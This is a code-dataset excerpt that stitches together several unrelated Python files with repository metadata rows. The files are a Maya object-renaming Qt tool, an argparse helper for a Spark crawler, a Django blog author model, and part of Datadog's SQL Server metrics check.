input_objects (list[str]): Allows funciton to work based on a provided
list. If nothing given, selection is assumed.
"""
name_return_list = []
if input_objects:
# ensure pymel nodes
input_objects = pm.ls(input_objects)
else:
input_objects = pm.ls(selection=True)
if not hierarchy:
for obj in input_objects:
if search_input in obj.name():
obj.rename(obj.name().replace(search_input, replace_output))
name_return_list.append(obj.name())
else:
hierarchyNodes = []
for obj in input_objects:
hierarchyNodes.extend(obj.getChildren(allDescendents=True))
hierarchyNodes.extend(input_objects)
for obj in hierarchyNodes:
if search_input in obj.name():
obj.rename(obj.name().replace(search_input, replace_output))
name_return_list.append(obj.name())
return name_return_list
# Make input_objects required?
def clear_end_digits(input_objects=[]):
name_return_list = []
if input_objects:
# ensure pymel nodes
input_objects = pm.ls(input_objects)
else:
input_objects = pm.ls(selection=True)
for obj in input_objects:
try:
int(obj.name()[-1])
except ValueError:
continue
if pm.objExists(obj.name()[:-1]):
pm.warning('While removing end digits, another object with name '
'"{}" was found. Function may have failed to remove '
'end digits properly.'.format(obj.name()[:-1]))
obj.rename(obj.name()[:-1])
name_return_list.append(obj.name())
return name_return_list
class NamingWidget(QtWidgets.QFrame):
def __init__(self):
QtWidgets.QFrame.__init__(self)
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)
self.setWindowTitle('Name Tool')
self.setMinimumHeight(285)
self.setMinimumWidth(320)
self.setLayout(QtWidgets.QVBoxLayout())
self.layout().setContentsMargins(5, 5, 5, 5)
self.layout().setSpacing(0)
self.layout().setAlignment(QtCore.Qt.AlignTop)
# Rename Widget
rename_widget = QtWidgets.QWidget() # Widget holding upper name stuff
rename_widget.setLayout(QtWidgets.QVBoxLayout())
rename_widget.layout().setContentsMargins(0, 0, 0, 0)
rename_widget.layout().setSpacing(2)
rename_widget.setSizePolicy(QtWidgets.QSizePolicy.Minimum,
QtWidgets.QSizePolicy.Fixed)
self.layout().addWidget(rename_widget)
# Label Splitter
rename_splitter = Splitter.Splitter('Rename') # Custom splitter widget
rename_widget.layout().addWidget(rename_splitter)
# Rename Input
rename_text_layout = QtWidgets.QHBoxLayout()
rename_text_layout.setContentsMargins(4, 0, 4, 0)
rename_text_layout.setSpacing(2)
rename_widget.layout().addLayout(rename_text_layout)
rename_text_label = QtWidgets.QLabel('Rename: ')
self.rename_line_edit = QtWidgets.QLineEdit()
self.rename_line_edit.setPlaceholderText(
'Component_Side_objectName_##_CTL') # Grey text
rename_text_layout.addWidget(rename_text_label)
rename_text_layout.addWidget(self.rename_line_edit)
# Regular Expression
# () indicates excluding these symbols, [] indicates accepts these
# Having a ^ between symbols indicates all symbols between are included
reg_ex = QtCore.QRegExp('^(?!@$^_)[0-9a-zA-Z_#]+')
text_validator = QtGui.QRegExpValidator(reg_ex, self.rename_line_edit)
self.rename_line_edit.setValidator(text_validator)
rename_widget.layout().addLayout(Splitter.SplitterLayout())
# AlphaNumeric Options
rename_alphanumberic_layout = QtWidgets.QHBoxLayout()
rename_alphanumberic_layout.setContentsMargins(4, 0, 4, 0)
rename_alphanumberic_layout.setSpacing(2)
rename_widget.layout().addLayout(rename_alphanumberic_layout)
rename_alphanumberic_label = QtWidgets.QLabel('Name List Method: ')
self.rename_alpha_radio = QtWidgets.QRadioButton('Alpha')
self.rename_number_radio = QtWidgets.QRadioButton('Numbers')
self.rename_number_radio.setChecked(True)
self.rename_alpha_radio.setFixedHeight(19)
rename_alphanumberic_layout.addWidget(rename_alphanumberic_label)
rename_alphanumberic_layout.addSpacerItem(
QtWidgets.QSpacerItem(5, 5, QtWidgets.QSizePolicy.Expanding)
)
rename_alphanumberic_layout.addWidget(self.rename_alpha_radio)
rename_alphanumberic_layout.addWidget(self.rename_number_radio)
# Hidden Upper/Lower Case buttons
rename_options_layout = QtWidgets.QHBoxLayout()
rename_options_layout.setContentsMargins(4, 0, 4, 0)
rename_options_layout.setSpacing(2)
rename_widget.layout().addLayout(rename_options_layout)
self.alpha_case_group = QtWidgets.QButtonGroup()
self.lower_radio = QtWidgets.QRadioButton('Lowercase')
self.upper_radio = QtWidgets.QRadioButton('Uppercase')
self.alpha_case_group.addButton(self.lower_radio)
self.alpha_case_group.addButton(self.upper_radio)
self.lower_radio.setVisible(False)
self.upper_radio.setVisible(False)
self.lower_radio.setFixedHeight(19)
self.upper_radio.setFixedHeight(19)
self.upper_radio.setChecked(True)
rename_options_layout.addWidget(self.lower_radio)
rename_options_layout.addSpacerItem(
QtWidgets.QSpacerItem(5, 5, QtWidgets.QSizePolicy.Expanding)
)
rename_options_layout.addWidget(self.upper_radio)
# Starting Number
rename_starting_number_layout = QtWidgets.QHBoxLayout()
rename_starting_number_layout.setContentsMargins(4, 0, 4, 0)
rename_starting_number_layout.setSpacing(2)
rename_widget.layout().addLayout(rename_starting_number_layout)
self.rename_start_label = QtWidgets.QLabel('Starting Number: ')
self.rename_start_number = QtWidgets.QSpinBox()
self.rename_start_number.setFixedWidth(50)
self.rename_start_number.setMinimum(0)
self.rename_start_number.setMaximum(999)
self.list_end_condition_label = QtWidgets.QLabel('End with "END":')
self.list_end_condition_checkbox = QtWidgets.QCheckBox()
rename_starting_number_layout.addWidget(self.rename_start_label)
rename_starting_number_layout.addWidget(self.rename_start_number)
rename_starting_number_layout.addSpacerItem(
QtWidgets.QSpacerItem(5, 5, QtWidgets.QSizePolicy.Expanding)
)
rename_starting_number_layout.addWidget(self.list_end_condition_label)
rename_starting_number_layout.addWidget(
self.list_end_condition_checkbox)
rename_widget.layout().addLayout(Splitter.SplitterLayout())
# Execute List Rename Button
rename_button_layout = QtWidgets.QHBoxLayout()
rename_button_layout.setContentsMargins(4, 0, 4, 0)
rename_button_layout.setSpacing(0)
rename_widget.layout().addLayout(rename_button_layout)
self.rename_label = QtWidgets.QLabel('')
rename_button = QtWidgets.QPushButton('Rename')
rename_button.setFixedHeight(20)
rename_button.setFixedWidth(55)
rename_button_layout.addWidget(self.rename_label)
rename_button_layout.addWidget(rename_button)
# Replace Widget
replace_widget = QtWidgets.QWidget() # Widget holding lower name stuff
replace_widget.setLayout(QtWidgets.QVBoxLayout())
replace_widget.layout().setContentsMargins(0, 0, 0, 0)
replace_widget.layout().setSpacing(2)
replace_widget.setSizePolicy(QtWidgets.QSizePolicy.Minimum,
QtWidgets.QSizePolicy.Fixed)
self.layout().addWidget(replace_widget)
replace_splitter = Splitter.Splitter('Find & Replace')
replace_widget.layout().addWidget(replace_splitter)
find_label = QtWidgets.QLabel('Find: ')
self.find_line_edit = QtWidgets.QLineEdit()
replace_label = QtWidgets.QLabel('Replace: ')
self.replace_line_edit = QtWidgets.QLineEdit()
find_label.setFixedWidth(55)
replace_label.setFixedWidth(55)
reg_ex = QtCore.QRegExp('[0-9a-zA-Z_]+')
text_validator = QtGui.QRegExpValidator(reg_ex, self.rename_line_edit)
self.find_line_edit.setValidator(text_validator)
self.replace_line_edit.setValidator(text_validator)
find_layout = QtWidgets.QHBoxLayout()
find_layout.setContentsMargins(4, 0, 4, 0)
find_layout.setSpacing(2)
find_layout.addWidget(find_label)
find_layout.addWidget(self.find_line_edit)
replace_widget.layout().addLayout(find_layout)
replace_layout = QtWidgets.QHBoxLayout()
replace_layout.setContentsMargins(4, 0, 4, 0)
replace_layout.setSpacing(2)
replace_layout.addWidget(replace_label)
replace_layout.addWidget(self.replace_line_edit)
replace_widget.layout().addLayout(replace_layout)
replace_widget.layout().addLayout(Splitter.SplitterLayout())
selection_layout = QtWidgets.QHBoxLayout()
selection_layout.setContentsMargins(4, 0, 4, 0)
selection_layout.setSpacing(2)
replace_widget.layout().addLayout(selection_layout)
selection_mode_label = QtWidgets.QLabel('Selection Mode: ')
self.selected_radio_button = QtWidgets.QRadioButton('Selected')
self.selected_radio_button.setFixedHeight(19)
self.selected_radio_button.setChecked(True)
self.hierarchy_radio_button = QtWidgets.QRadioButton('Hierarchy')
self.hierarchy_radio_button.setFixedHeight(19)
selection_layout.addWidget(selection_mode_label)
spacer_item = QtWidgets.QSpacerItem(5, 5,
QtWidgets.QSizePolicy.Expanding)
selection_layout.addSpacerItem(spacer_item)
selection_layout.addWidget(self.selected_radio_button)
selection_layout.addWidget(self.hierarchy_radio_button)
replace_widget.layout().addLayout(Splitter.SplitterLayout())
replace_button = QtWidgets.QPushButton('Replace')
replace_button.setFixedHeight(20)
replace_button.setFixedWidth(55)
replace_button_layout = QtWidgets.QHBoxLayout()
replace_button_layout.setContentsMargins(4, 0, 4, 0)
replace_button_layout.setSpacing(0)
replace_button_layout.setAlignment(QtCore.Qt.AlignRight)
replace_button_layout.addWidget(replace_button)
replace_widget.layout().addLayout(replace_button_layout)
# Prefix and Suffix
additions_widget = QtWidgets.QWidget()
additions_widget.setLayout(QtWidgets.QVBoxLayout())
additions_widget.layout().setContentsMargins(0, 0, 0, 0)
additions_widget.layout().setSpacing(2)
additions_widget.setSizePolicy(QtWidgets.QSizePolicy.Minimum,
QtWidgets.QSizePolicy.Fixed)
self.layout().addWidget(additions_widget)
# Label Splitter
additions_splitter = Splitter.Splitter('Prefix & Suffix')
additions_widget.layout().addWidget(additions_splitter)
prefix_layout = QtWidgets.QHBoxLayout()
prefix_layout.setContentsMargins(4, 0, 4, 0)
prefix_layout.setSpacing(2)
additions_widget.layout().addLayout(prefix_layout)
suffix_layout = QtWidgets.QHBoxLayout()
suffix_layout.setContentsMargins(4, 0, 4, 0)
suffix_layout.setSpacing(2)
additions_widget.layout().addLayout(suffix_layout)
prefix_label = QtWidgets.QLabel('Prefix:')
self.prefix_line_edit = QtWidgets.QLineEdit()
self.prefix_add_button = QtWidgets.QPushButton('+')
self.prefix_remove_button = QtWidgets.QPushButton('-')
self.prefix_replace_button = QtWidgets.QPushButton('><') # Change later
prefix_layout.addWidget(prefix_label)
prefix_layout.addWidget(self.prefix_line_edit)
prefix_layout.addWidget(self.prefix_add_button)
prefix_layout.addWidget(self.prefix_remove_button)
prefix_layout.addWidget(self.prefix_replace_button)
suffix_label = QtWidgets.QLabel('Suffix:')
self.suffix_line_edit = QtWidgets.QLineEdit()
self.suffix_add_button = QtWidgets.QPushButton('+')
self.suffix_remove_button = QtWidgets.QPushButton('-')
self.suffix_replace_button = QtWidgets.QPushButton('><') # Change later
suffix_layout.addWidget(suffix_label)
suffix_layout.addWidget(self.suffix_line_edit)
suffix_layout.addWidget(self.suffix_add_button)
suffix_layout.addWidget(self.suffix_remove_button)
suffix_layout.addWidget(self.suffix_replace_button)
prefix_label.setFixedWidth(55)
suffix_label.setFixedWidth(55)
self.prefix_add_button.setFixedWidth(25)
self.prefix_remove_button.setFixedWidth(25)
self.prefix_replace_button.setFixedWidth(25)
self.suffix_add_button.setFixedWidth(25)
self.suffix_remove_button.setFixedWidth(25)
self.suffix_replace_button.setFixedWidth(25)
additions_widget.layout().addLayout(Splitter.SplitterLayout())
# Name Cleanup
cleanup_widget = QtWidgets.QWidget()
cleanup_widget.setLayout(QtWidgets.QVBoxLayout())
cleanup_widget.layout().setContentsMargins(0, 0, 0, 0)
cleanup_widget.layout().setSpacing(2)
cleanup_widget.setSizePolicy(QtWidgets.QSizePolicy.Minimum,
QtWidgets.QSizePolicy.Fixed)
self.layout().addWidget(cleanup_widget)
# Label Splitter
cleanup_splitter = Splitter.Splitter('Cleanup')
cleanup_widget.layout().addWidget(cleanup_splitter)
cleanup_layout = QtWidgets.QHBoxLayout()
cleanup_layout.setContentsMargins(4, 0, 4, 0)
cleanup_layout.setSpacing(2)
cleanup_widget.layout().addLayout(cleanup_layout)
self.end_digits_button = QtWidgets.QPushButton('End Digits')
# Below buttons need proper functions written...-----------
self.shape_name_button = QtWidgets.QPushButton('Shape Names')
self.deformer_name_button = QtWidgets.QPushButton('Deformer Names')
cleanup_layout.addWidget(self.end_digits_button)
cleanup_layout.addWidget(self.shape_name_button)
cleanup_layout.addWidget(self.deformer_name_button)
# State Change modifiers
# Need to set the changed status of the alphanumeric radio buttons to
# influence the _toggle_rename_vis() function
self.rename_alpha_radio.clicked.connect(self._toggle_rename_vis)
self.rename_number_radio.clicked.connect(self._toggle_rename_vis)
self.lower_radio.clicked.connect(self._update_example)
self.upper_radio.clicked.connect(self._update_example)
self.rename_start_number.valueChanged.connect(self._update_example)
self.rename_line_edit.textChanged.connect(self._update_example)
rename_button.clicked.connect(self.list_rename)
replace_button.clicked.connect(self.replace_text)
self.prefix_add_button.clicked.connect(
partial(self.edit_prefix, True, False, False))
self.prefix_remove_button.clicked.connect(
partial(self.edit_prefix, False, False, True))
self.prefix_replace_button.clicked.connect(
partial(self.edit_prefix, False, True, False))
self.suffix_add_button.clicked.connect(
partial(self.edit_suffix, True, False, False))
self.suffix_remove_button.clicked.connect(
partial(self.edit_suffix, False, False, True))
self.suffix_replace_button.clicked.connect(
partial(self.edit_suffix, False, True, False))
self.end_digits_button.clicked.connect(clear_end_digits)
self._update_example()
def _toggle_rename_vis(self):
visible = self.rename_alpha_radio.isChecked()
self.lower_radio.setVisible(visible)
self.upper_radio.setVisible(visible)
self.rename_start_number.setValue(int(visible))
self.rename_start_number.setMinimum(int(visible))
def _get_rename_settings(self):
text = str(self.rename_line_edit.text()).strip()
naming_method = self.rename_number_radio.isChecked()
starting_number = self.rename_start_number.value()
upper = True
if naming_method is False:
upper = self.upper_radio.isChecked()
return text, starting_number, naming_method, upper
def _update_example(self):
example_text = ''
text, starting_number, naming_method, upper = \
self._get_rename_settings()
if not text: # text is a variable from above
self.rename_label.setText('<font color=#646464>e.g.</font>')
return
example_text += text
if not naming_method:
if upper:
if '#' in example_text:
padding = example_text.count('#')
if padding > 1:
full_pad = ''
for pad in range(padding):
full_pad += '#'
example_text = example_text.replace(full_pad, 'A')
else:
example_text = example_text.replace('#', 'A')
else:
if '#' in example_text:
padding = example_text.count('#')
if padding > 1:
full_pad = ''
for pad in range(padding):
full_pad += '#'
example_text = example_text.replace(full_pad, 'a')
else:
example_text = example_text.replace('#', 'a')
else:
if '#' in example_text:
padding = example_text.count('#')
if padding > 1:
full_pad = ''
for pad in range(padding):
full_pad += '#'
example_text = example_text.replace(
full_pad, str(starting_number).zfill(padding)
)
else:
example_text = example_text.replace(
'#', str(starting_number).zfill(padding)
)
self.rename_label.setText('<font color=#646464>e.g. %s</font>'
% example_text)
def list_rename(self):
text, starting_number, naming_method, upper = \
self._get_rename_settings()
if naming_method:
index_type = True
else:
index_type = False
if upper:
case = True
else:
case = False
ending = self.list_end_condition_checkbox.isChecked()
with UndoContext():
list_renamer(
new_name=text,
numeric_index=index_type,
start_number=starting_number,
upper_case=case,
end_name=ending
)
def replace_text(self):
find_text = str(self.find_line_edit.text()).strip()
replace_text = str(self.replace_line_edit.text()).strip()
select_scope = not(self.selected_radio_button.isChecked())
with UndoContext():
search_replace_name(
search_input=find_text,
replace_output=replace_text,
hierarchy=select_scope
)
def edit_prefix(self, add=False, replace=False, remove=False):
prefix = str(self.prefix_line_edit.text()).strip()
with UndoContext():
set_prefix(input_prefix=prefix, add=add, remove=remove, replace=replace)
def edit_suffix(self, add=False, replace=False, remove=False):
suffix = str(self.suffix_line_edit.text()).strip()
with UndoContext():
set_suffix(input_suffix=suffix, add=add, remove=remove, replace=replace)
| 38.787765
| 84
| 0.640124
|
e04a678183539878c3118fb66d4952edf20640d7
| 1,286
|
py
|
Python
|
spot/crawler/crawler_args.py
|
AbsaOSS/spot
|
314b16b7722e189de5dc50bcd1ba3434c5df1de8
|
[
"Apache-2.0"
] | 1
|
2022-01-30T06:17:11.000Z
|
2022-01-30T06:17:11.000Z
|
spot/crawler/crawler_args.py
|
AbsaOSS/spot
|
314b16b7722e189de5dc50bcd1ba3434c5df1de8
|
[
"Apache-2.0"
] | 2
|
2022-01-14T19:41:02.000Z
|
2022-02-02T16:04:49.000Z
|
spot/crawler/crawler_args.py
|
AbsaOSS/spot
|
314b16b7722e189de5dc50bcd1ba3434c5df1de8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 ABSA Group Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import datetime
datetime_format = "%Y-%m-%dT%H:%M:%S"
class CrawlerArgs:
def __init__(self):
self.parser = argparse.ArgumentParser()
self.parser.add_argument("--min_end_date",
help=f"Retrieve apps completed after {datetime_format.replace('%', '%%')}",
type=lambda s: datetime.datetime.strptime(s, datetime_format))
self.parser.add_argument("--config_path",
help=f"Absolute path to config.ini configuration file, \
e.g. '/opt/config.ini'")
def parse_args(self, argv=None):
return self.parser.parse_args(argv)
| 37.823529
| 108
| 0.655521
|
1927d9a534ead0434e59c076d52ceeff615466c1
| 943
|
py
|
Python
|
apps/blogUserApp/models.py
|
sepmoon/django_blog_demo
|
e77bb452e9161f6749ad970e5af35ec9ff7dc7a4
|
[
"MIT"
] | null | null | null |
apps/blogUserApp/models.py
|
sepmoon/django_blog_demo
|
e77bb452e9161f6749ad970e5af35ec9ff7dc7a4
|
[
"MIT"
] | null | null | null |
apps/blogUserApp/models.py
|
sepmoon/django_blog_demo
|
e77bb452e9161f6749ad970e5af35ec9ff7dc7a4
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from datetime import datetime
from django.db import models
# Create your models here.
class BlogAuthorModel(models.Model):
"""
博客用户信息设置
"""
name = models.CharField(max_length=20, verbose_name=u"博主昵称")
author_logo = models.ImageField(verbose_name=u"博主头像", upload_to="images/author", blank=True, null=True)
author_desc = models.TextField(max_length=100, verbose_name=u"博主信息")
author_wechat = models.CharField(max_length=10, verbose_name=u"博主微信")
author_qq = models.CharField(max_length=10, verbose_name=u"博主QQ")
author_weibo = models.CharField(max_length=10, verbose_name=u"博主微博")
author_github = models.CharField(max_length=10, verbose_name=u"博主github")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"修改时间")
class Meta:
verbose_name = u"博客用户管理"
verbose_name_plural = verbose_name
def __str__(self):
return self.name
| 33.678571
| 107
| 0.722163
|
50aef9861b82f3d61aa1f87bcc7658661d353df1
| 41,124
|
py
|
Python
|
sqlserver/datadog_checks/sqlserver/sqlserver.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | 1
|
2021-03-24T13:00:14.000Z
|
2021-03-24T13:00:14.000Z
|
sqlserver/datadog_checks/sqlserver/sqlserver.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | null | null | null |
sqlserver/datadog_checks/sqlserver/sqlserver.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
'''
Check the performance counters from SQL Server
For information on how to report the metrics available in the sys.dm_os_performance_counters table see
http://blogs.msdn.com/b/psssql/archive/2013/09/23/interpreting-the-counter-values-from-sys-dm-os-performance-counters.aspx # noqa: E501
'''
from __future__ import division
from collections import defaultdict
from contextlib import contextmanager
from six import raise_from
from datadog_checks.base import AgentCheck
from datadog_checks.base.config import is_affirmative
from .utils import set_default_driver_conf
try:
import adodbapi
except ImportError:
adodbapi = None
try:
import pyodbc
except ImportError:
pyodbc = None
if adodbapi is None and pyodbc is None:
raise ImportError('adodbapi or pyodbc must be installed to use this check.')
set_default_driver_conf()
EVENT_TYPE = SOURCE_TYPE_NAME = 'sql server'
ALL_INSTANCES = 'ALL'
VALID_METRIC_TYPES = ('gauge', 'rate', 'histogram')
# Constant for SQLServer cntr_type
PERF_LARGE_RAW_BASE = 1073939712
PERF_RAW_LARGE_FRACTION = 537003264
PERF_AVERAGE_BULK = 1073874176
PERF_COUNTER_BULK_COUNT = 272696576
PERF_COUNTER_LARGE_RAWCOUNT = 65792
# Queries
COUNTER_TYPE_QUERY = '''select distinct cntr_type
from sys.dm_os_performance_counters
where counter_name = ?;'''
BASE_NAME_QUERY = (
'''select distinct counter_name
from sys.dm_os_performance_counters
where (counter_name=? or counter_name=?
or counter_name=?) and cntr_type=%s;'''
% PERF_LARGE_RAW_BASE
)
INSTANCES_QUERY = '''select instance_name
from sys.dm_os_performance_counters
where counter_name=? and instance_name!='_Total';'''
VALUE_AND_BASE_QUERY = '''select counter_name, cntr_type, cntr_value, instance_name, object_name
from sys.dm_os_performance_counters
where counter_name in (%s)
order by cntr_type;'''
DATABASE_EXISTS_QUERY = 'select name from sys.databases;'
# Performance tables
DEFAULT_PERFORMANCE_TABLE = "sys.dm_os_performance_counters"
DM_OS_WAIT_STATS_TABLE = "sys.dm_os_wait_stats"
DM_OS_MEMORY_CLERKS_TABLE = "sys.dm_os_memory_clerks"
DM_OS_VIRTUAL_FILE_STATS = "sys.dm_io_virtual_file_stats"
class SQLConnectionError(Exception):
"""
Exception raised for SQL instance connection issues
"""
pass
class SQLServer(AgentCheck):
SERVICE_CHECK_NAME = 'sqlserver.can_connect'
# FIXME: 6.x, set default to 5s (like every check)
DEFAULT_COMMAND_TIMEOUT = 30
DEFAULT_DATABASE = 'master'
DEFAULT_DRIVER = 'SQL Server'
DEFAULT_DB_KEY = 'database'
PROC_GUARD_DB_KEY = 'proc_only_if_database'
METRICS = [
('sqlserver.buffer.cache_hit_ratio', 'Buffer cache hit ratio', ''), # RAW_LARGE_FRACTION
('sqlserver.buffer.page_life_expectancy', 'Page life expectancy', ''), # LARGE_RAWCOUNT
('sqlserver.stats.batch_requests', 'Batch Requests/sec', ''), # BULK_COUNT
('sqlserver.stats.sql_compilations', 'SQL Compilations/sec', ''), # BULK_COUNT
('sqlserver.stats.sql_recompilations', 'SQL Re-Compilations/sec', ''), # BULK_COUNT
('sqlserver.stats.connections', 'User Connections', ''), # LARGE_RAWCOUNT
('sqlserver.stats.lock_waits', 'Lock Waits/sec', '_Total'), # BULK_COUNT
('sqlserver.access.page_splits', 'Page Splits/sec', ''), # BULK_COUNT
('sqlserver.stats.procs_blocked', 'Processes blocked', ''), # LARGE_RAWCOUNT
('sqlserver.buffer.checkpoint_pages', 'Checkpoint pages/sec', ''), # BULK_COUNT
]
valid_connectors = []
valid_adoproviders = ['SQLOLEDB', 'MSOLEDBSQL', 'SQLNCLI11']
default_adoprovider = 'SQLOLEDB'
if adodbapi is not None:
valid_connectors.append('adodbapi')
if pyodbc is not None:
valid_connectors.append('odbc')
valid_tables = [
DEFAULT_PERFORMANCE_TABLE,
DM_OS_WAIT_STATS_TABLE,
DM_OS_MEMORY_CLERKS_TABLE,
DM_OS_VIRTUAL_FILE_STATS,
]
def __init__(self, name, init_config, instances):
super(SQLServer, self).__init__(name, init_config, instances)
# Cache connections
self.connections = {}
self.failed_connections = {}
self.instances_metrics = {}
self.instances_per_type_metrics = defaultdict(dict)
self.existing_databases = None
self.do_check = {}
self.proc_type_mapping = {'gauge': self.gauge, 'rate': self.rate, 'histogram': self.histogram}
self.adoprovider = self.default_adoprovider
self.connector = init_config.get('connector', 'adodbapi')
if self.connector.lower() not in self.valid_connectors:
self.log.error("Invalid database connector %s, defaulting to adodbapi", self.connector)
self.connector = 'adodbapi'
self.adoprovider = init_config.get('adoprovider', self.default_adoprovider)
if self.adoprovider.upper() not in self.valid_adoproviders:
self.log.error(
"Invalid ADODB provider string %s, defaulting to %s", self.adoprovider, self.default_adoprovider
)
self.adoprovider = self.default_adoprovider
# Pre-process the list of metrics to collect
self.custom_metrics = init_config.get('custom_metrics', [])
for instance in instances:
try:
instance_key = self._conn_key(instance, self.DEFAULT_DB_KEY)
self.do_check[instance_key] = True
# check to see if the database exists before we try any connections to it
with self.open_managed_db_connections(instance, None, db_name=self.DEFAULT_DATABASE):
db_exists, context = self._check_db_exists(instance)
if db_exists:
if instance.get('stored_procedure') is None:
with self.open_managed_db_connections(instance, self.DEFAULT_DB_KEY):
self._make_metric_list_to_collect(instance, self.custom_metrics)
else:
# How much do we care that the DB doesn't exist?
ignore = is_affirmative(instance.get("ignore_missing_database", False))
if ignore is not None and ignore:
# not much : we expect it. leave checks disabled
self.do_check[instance_key] = False
self.log.warning("Database %s does not exist. Disabling checks for this instance.", context)
else:
# yes we do. Keep trying
self.log.error("Database %s does not exist. Fix issue and restart agent", context)
except SQLConnectionError:
self.log.exception("Skipping SQL Server instance")
continue
except Exception as e:
self.log.exception("Initialization exception %s", e)
continue
def _check_db_exists(self, instance):
"""
Check if the database we're targeting actually exists
If not then we won't do any checks
This allows the same config to be installed on many servers but fail gracefully
"""
dsn, host, username, password, database, driver = self._get_access_info(instance, self.DEFAULT_DB_KEY)
context = "{} - {}".format(host, database)
if self.existing_databases is None:
cursor = self.get_cursor(instance, None, self.DEFAULT_DATABASE)
try:
self.existing_databases = {}
cursor.execute(DATABASE_EXISTS_QUERY)
for row in cursor:
self.existing_databases[row.name] = True
except Exception as e:
self.log.error("Failed to check if database %s exists: %s", database, e)
return False, context
finally:
self.close_cursor(cursor)
return database in self.existing_databases, context
def _make_metric_list_to_collect(self, instance, custom_metrics):
"""
Store the list of metrics to collect by instance_key.
Will also create and cache cursors to query the db.
"""
metrics_to_collect = []
for name, counter_name, instance_name in self.METRICS:
try:
sql_type, base_name = self.get_sql_type(instance, counter_name)
cfg = {}
cfg['name'] = name
cfg['counter_name'] = counter_name
cfg['instance_name'] = instance_name
metrics_to_collect.append(
self.typed_metric(instance, cfg, DEFAULT_PERFORMANCE_TABLE, base_name, None, sql_type, None)
)
except SQLConnectionError:
raise
except Exception:
self.log.warning("Can't load the metric %s, ignoring", name, exc_info=True)
continue
# Load any custom metrics from conf.d/sqlserver.yaml
for row in custom_metrics:
db_table = row.get('table', DEFAULT_PERFORMANCE_TABLE)
if db_table not in self.valid_tables:
self.log.error('%s has an invalid table name: %s', row['name'], db_table)
continue
if db_table == DEFAULT_PERFORMANCE_TABLE:
user_type = row.get('type')
if user_type is not None and user_type not in VALID_METRIC_TYPES:
self.log.error('%s has an invalid metric type: %s', row['name'], user_type)
sql_type = None
try:
if user_type is None:
sql_type, base_name = self.get_sql_type(instance, row['counter_name'])
except Exception:
self.log.warning("Can't load the metric %s, ignoring", row['name'], exc_info=True)
continue
metrics_to_collect.append(
self.typed_metric(instance, row, db_table, base_name, user_type, sql_type, None)
)
else:
for column in row['columns']:
metrics_to_collect.append(
self.typed_metric(instance, row, db_table, base_name, None, sql_type, column)
)
instance_key = self._conn_key(instance, self.DEFAULT_DB_KEY)
self.instances_metrics[instance_key] = metrics_to_collect
simple_metrics = []
fraction_metrics = []
wait_stat_metrics = []
vfs_metrics = []
clerk_metrics = []
self.log.debug("metrics to collect %s", metrics_to_collect)
for m in metrics_to_collect:
if type(m) is SqlSimpleMetric:
self.log.debug("Adding simple metric %s", m.sql_name)
simple_metrics.append(m.sql_name)
elif type(m) is SqlFractionMetric or type(m) is SqlIncrFractionMetric:
self.log.debug("Adding fraction metric %s", m.sql_name)
fraction_metrics.append(m.sql_name)
fraction_metrics.append(m.base_name)
elif type(m) is SqlOsWaitStat:
self.log.debug("Adding SqlOsWaitStat metric %s", m.sql_name)
wait_stat_metrics.append(m.sql_name)
elif type(m) is SqlIoVirtualFileStat:
self.log.debug("Adding SqlIoVirtualFileStat metric %s", m.sql_name)
vfs_metrics.append(m.sql_name)
elif type(m) is SqlOsMemoryClerksStat:
self.log.debug("Adding SqlOsMemoryClerksStat metric %s", m.sql_name)
clerk_metrics.append(m.sql_name)
self.instances_per_type_metrics[instance_key]["SqlSimpleMetric"] = simple_metrics
self.instances_per_type_metrics[instance_key]["SqlFractionMetric"] = fraction_metrics
self.instances_per_type_metrics[instance_key]["SqlOsWaitStat"] = wait_stat_metrics
self.instances_per_type_metrics[instance_key]["SqlIoVirtualFileStat"] = vfs_metrics
self.instances_per_type_metrics[instance_key]["SqlOsMemoryClerksStat"] = clerk_metrics
def typed_metric(self, instance, cfg_inst, table, base_name, user_type, sql_type, column):
'''
Create the appropriate SqlServerMetric object, each implementing its method to
fetch the metrics properly.
If a `type` was specified in the config, it is used to report the value
directly fetched from SQLServer. Otherwise, it is decided based on the
sql_type, according to microsoft's documentation.
'''
if table == DEFAULT_PERFORMANCE_TABLE:
metric_type_mapping = {
PERF_COUNTER_BULK_COUNT: (self.rate, SqlSimpleMetric),
PERF_COUNTER_LARGE_RAWCOUNT: (self.gauge, SqlSimpleMetric),
PERF_LARGE_RAW_BASE: (self.gauge, SqlSimpleMetric),
PERF_RAW_LARGE_FRACTION: (self.gauge, SqlFractionMetric),
PERF_AVERAGE_BULK: (self.gauge, SqlIncrFractionMetric),
}
if user_type is not None:
# user type overrides any other value
metric_type = getattr(self, user_type)
cls = SqlSimpleMetric
else:
metric_type, cls = metric_type_mapping[sql_type]
else:
table_type_mapping = {
DM_OS_WAIT_STATS_TABLE: (self.gauge, SqlOsWaitStat),
DM_OS_MEMORY_CLERKS_TABLE: (self.gauge, SqlOsMemoryClerksStat),
DM_OS_VIRTUAL_FILE_STATS: (self.gauge, SqlIoVirtualFileStat),
}
metric_type, cls = table_type_mapping[table]
return cls(self._get_connector(instance), cfg_inst, base_name, metric_type, column, self.log)
def _get_connector(self, instance):
connector = instance.get('connector', self.connector)
if connector != self.connector:
if connector.lower() not in self.valid_connectors:
self.log.warning("Invalid database connector %s using default %s", connector, self.connector)
connector = self.connector
else:
self.log.debug("Overriding default connector for %s with %s", instance['host'], connector)
return connector
def _get_adoprovider(self, instance):
provider = instance.get('adoprovider', self.default_adoprovider)
if provider != self.adoprovider:
if provider.upper() not in self.valid_adoproviders:
